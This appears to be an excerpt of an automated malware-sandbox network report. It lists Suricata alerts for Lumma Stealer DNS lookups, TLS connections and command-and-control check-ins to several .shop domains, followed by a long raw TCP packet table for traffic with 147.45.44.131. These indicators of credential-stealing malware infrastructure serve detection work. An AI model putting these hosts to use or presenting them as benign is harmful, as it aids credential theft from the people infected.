2024-09-26T21:06:08.617671+0200	2056165	ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)	1	192.168.2.4	49732	104.21.4.136	443	TCP
2024-09-26T21:06:09.339616+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49732	104.21.4.136	443	TCP
2024-09-26T21:06:09.339616+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49732	104.21.4.136	443	TCP
2024-09-26T21:06:09.346176+0200	2056162	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop)	1	192.168.2.4	64591	1.1.1.1	53	UDP
2024-09-26T21:06:09.839286+0200	2056163	ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)	1	192.168.2.4	49733	188.114.96.3	443	TCP
2024-09-26T21:06:10.307758+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49733	188.114.96.3	443	TCP
2024-09-26T21:06:10.307758+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49733	188.114.96.3	443	TCP
2024-09-26T21:06:10.311075+0200	2056160	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop)	1	192.168.2.4	60410	1.1.1.1	53	UDP
2024-09-26T21:06:10.796038+0200	2056161	ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI)	1	192.168.2.4	49734	188.114.96.3	443	TCP
2024-09-26T21:06:11.270099+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49734	188.114.96.3	443	TCP
2024-09-26T21:06:11.270099+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49734	188.114.96.3	443	TCP
2024-09-26T21:06:11.273157+0200	2056158	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop)	1	192.168.2.4	54684	1.1.1.1	53	UDP
2024-09-26T21:06:11.757427+0200	2056159	ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI)	1	192.168.2.4	49735	188.114.97.3	443	TCP
2024-09-26T21:06:12.236719+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49735	188.114.97.3	443	TCP
2024-09-26T21:06:12.236719+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49735	188.114.97.3	443	TCP
2024-09-26T21:06:12.238203+0200	2056156	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop)	1	192.168.2.4	57422	1.1.1.1	53	UDP
2024-09-26T21:06:12.715639+0200	2056157	ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI)	1	192.168.2.4	49736	172.67.162.108	443	TCP
2024-09-26T21:06:13.185311+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49736	172.67.162.108	443	TCP
2024-09-26T21:06:13.185311+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49736	172.67.162.108	443	TCP
2024-09-26T21:06:13.186601+0200	2056154	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop)	1	192.168.2.4	64256	1.1.1.1	53	UDP
2024-09-26T21:06:13.686133+0200	2056155	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI)	1	192.168.2.4	49737	188.114.97.3	443	TCP
2024-09-26T21:06:14.187446+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49737	188.114.97.3	443	TCP
2024-09-26T21:06:14.187446+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49737	188.114.97.3	443	TCP
2024-09-26T21:06:14.188975+0200	2056152	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop)	1	192.168.2.4	50375	1.1.1.1	53	UDP
2024-09-26T21:06:14.675696+0200	2056153	ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI)	1	192.168.2.4	49738	188.114.96.3	443	TCP
2024-09-26T21:06:15.341317+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49738	188.114.96.3	443	TCP
2024-09-26T21:06:15.341317+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49738	188.114.96.3	443	TCP
2024-09-26T21:06:15.342996+0200	2056150	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop)	1	192.168.2.4	52826	1.1.1.1	53	UDP
2024-09-26T21:06:15.870582+0200	2056151	ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI)	1	192.168.2.4	49739	172.67.208.139	443	TCP
2024-09-26T21:06:16.341299+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49739	172.67.208.139	443	TCP
2024-09-26T21:06:16.341299+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49739	172.67.208.139	443	TCP
2024-09-26T21:06:18.843057+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49741	104.21.2.13	443	TCP
2024-09-26T21:06:18.843057+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49741	104.21.2.13	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 21:06:04.929303885 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:04.934402943 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:04.934504986 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:04.935115099 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:04.940006018 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.634766102 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.634838104 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.634876013 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.634905100 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.634922981 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.634939909 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.634974003 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.635006905 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.635010004 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.635040045 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.635041952 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.635073900 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.635107040 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.635116100 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.635142088 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.635155916 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.640343904 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.640403032 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.640535116 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.677443981 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.677674055 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.677706957 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.677741051 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.677746058 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.677777052 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.677781105 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.677978992 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.678010941 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.678036928 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.678045034 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.678056955 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.678077936 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.678112030 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.678160906 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.678731918 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.678762913 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.678796053 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.678797007 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.678831100 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.678843975 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.678864956 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.679898024 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.682674885 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.682866096 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.682898998 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.682930946 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.682959080 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.682964087 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.682991982 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.683126926 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.683895111 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.719113111 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.719290972 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.719511032 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.770215988 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.770287037 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.770319939 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.770376921 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.770467997 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.770499945 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.770520926 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.770530939 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.770581007 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.770615101 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.770637989 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.770653963 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.770663023 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.770688057 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.770843983 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.770876884 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.770905972 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.770908117 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.770929098 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.770941973 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.770975113 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.771007061 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.771027088 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.771039009 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.771051884 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.771074057 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.771303892 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.771364927 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.771529913 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.771581888 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.771632910 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.771665096 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.771697044 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.771764040 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.771785975 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.771833897 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.771833897 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.771867990 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.771899939 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.771934032 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.771966934 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.772008896 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.772557974 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.772840977 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.772914886 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.775717020 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.775769949 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.775799990 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.775832891 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.775846004 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.775866032 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.775888920 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.775901079 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.776010036 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.776040077 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.776068926 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.776071072 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.776107073 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.776109934 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.776144028 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.776186943 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.776196003 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.776253939 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.811464071 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.811517954 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.811549902 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.811583042 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.811593056 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.811674118 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.862456083 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.862577915 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.862627029 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.862653017 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.862659931 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.862694025 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.862711906 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.862778902 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.862809896 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.862833023 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.862842083 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.862875938 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.862896919 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.862907887 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.862967014 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.863146067 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.863178015 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.863208055 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.863225937 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.863240004 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.863271952 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.863286972 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.863305092 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.863338947 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.863356113 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.863373041 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.863437891 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.863557100 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.863584995 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.863631964 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.863635063 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.863668919 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.863714933 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.863801956 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.863832951 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.863864899 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.863883972 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.863897085 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.863929987 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.863945961 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.864209890 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.864258051 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.864259005 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.864289999 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.864321947 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.864337921 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.864355087 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.864386082 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.864401102 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.864418030 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.864449978 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.864468098 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.864480972 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.864515066 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.864530087 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.864687920 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.864734888 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.864747047 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.864778996 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.864825010 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.864916086 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.864948034 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.864979982 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.865000963 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.865012884 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.865061998 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.865250111 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.865298986 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.865329981 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.865345001 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.865361929 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.865394115 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.865410089 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.865426064 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.865457058 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.865473032 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.865489006 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.865521908 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.865535975 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.865663052 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.865711927 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.865762949 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.865794897 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.865839005 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.865902901 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.865933895 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.865964890 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.865987062 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.865998030 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.866051912 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.866163969 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.866195917 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.866244078 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.866242886 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.866276979 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.866308928 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.866321087 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.866341114 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.866372108 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.866389036 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.866430044 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.867731094 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.867786884 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.867806911 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.904015064 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.904071093 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.904083014 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.904103041 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.904161930 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.904211998 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.904242992 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.904274940 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.904292107 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.904309034 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.904357910 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.904426098 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.904459000 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.904510021 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.973104954 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.973138094 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.973171949 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.973217010 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.973267078 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.973299026 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.973330975 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.973335028 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.973383904 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.973390102 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.973421097 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.973465919 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.973478079 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.973499060 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.973531008 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.973551035 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.973655939 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.973686934 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.973707914 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.973718882 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.973750114 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.973766088 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:05.973783970 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:05.973836899 CEST	49730	80	192.168.2.4	147.45.44.131
